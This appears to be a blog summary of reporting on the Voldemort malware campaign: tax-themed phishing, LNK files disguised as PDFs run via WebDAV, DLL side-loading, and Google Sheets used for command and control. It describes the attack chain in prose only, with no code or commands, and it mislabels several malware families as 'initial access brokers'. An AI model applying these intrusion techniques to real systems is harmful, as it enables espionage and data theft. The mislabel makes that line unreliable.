Select Page

Malware campaign using Google Sheets as a command-and-control mechanism

CISSP

Cybersecurity researchers discovered a novel malware campaign using Google Sheets as a command-and-control (C2) mechanism. Detected by Proofpoint starting August 5, 2024, the campaign impersonates tax authorities from various countries to target over 70 organizations globally using a custom tool called Voldemort. The campaign has not been attributed to a specific threat actor, but it resembles both cyber espionage and cybercrime activities.

Targeted Sectors:

  • A wide range of sectors including insurance, aerospace, transportation, academia, finance, technology, industrial, healthcare, automotive, hospitality, energy, government, media, manufacturing, telecom, and social benefit organizations.

Attack Methodology:

  • The campaign sends phishing emails claiming to be from tax authorities in several countries (U.S., U.K., France, Germany, Italy, India, Japan).
  • Emails direct recipients to Google AMP Cache URLs, which lead to an intermediate page that checks if the operating system is Windows.
  • If Windows is detected, it uses the search-ms: URI protocol to display a malicious Windows shortcut (LNK) file disguised as a PDF.
  • Executing the LNK file triggers PowerShell to run a Python script from a WebDAV share without downloading any files locally, with dependencies loaded directly from the WebDAV share.

Malware Capabilities:

  • The Python script collects system information and sends it as a Base64-encoded string to an actor-controlled domain.
  • It also shows a decoy PDF to the user and downloads a password-protected ZIP file from OpenDrive containing:
    • A legitimate executable (“CiscoCollabHost.exe”) vulnerable to DLL side-loading.
    • A malicious DLL (“CiscoSparkLauncher.dll”), named Voldemort, which is a custom backdoor written in C.
  • Voldemort uses Google Sheets for C2 communication, data exfiltration, and executing commands.

Techniques and Tools:

  • The campaign abuses file schema URIs (“file://”) to access external resources for malware staging via WebDAV and SMB.
  • These tactics are common among initial access brokers (IABs) like Latrodectus, DarkGate, and XWorm.

Findings and Observations:

  • Proofpoint identified six victims using Google Sheets, one of which may be a sandbox or a researcher.
  • The campaign appears to have cast a wide net before focusing on a smaller set of targets.
  • The campaign combines sophisticated techniques with basic methods, making it difficult to assess the threat actor’s technical capabilities and final objectives.

Context and Implications:

  • The campaign reflects a “Frankensteinian” mix of advanced and rudimentary tactics, complicating attribution and threat assessment.
  • It suggests potential espionage motives behind the campaign, although the final objectives remain unknown.
  • Netskope Threat Labs recently reported an updated version of the Latrodectus malware, highlighting ongoing evolution and feature enhancements, which include new backdoor commands for downloading shellcode and retrieving files.

Latest Post:

Pin It on Pinterest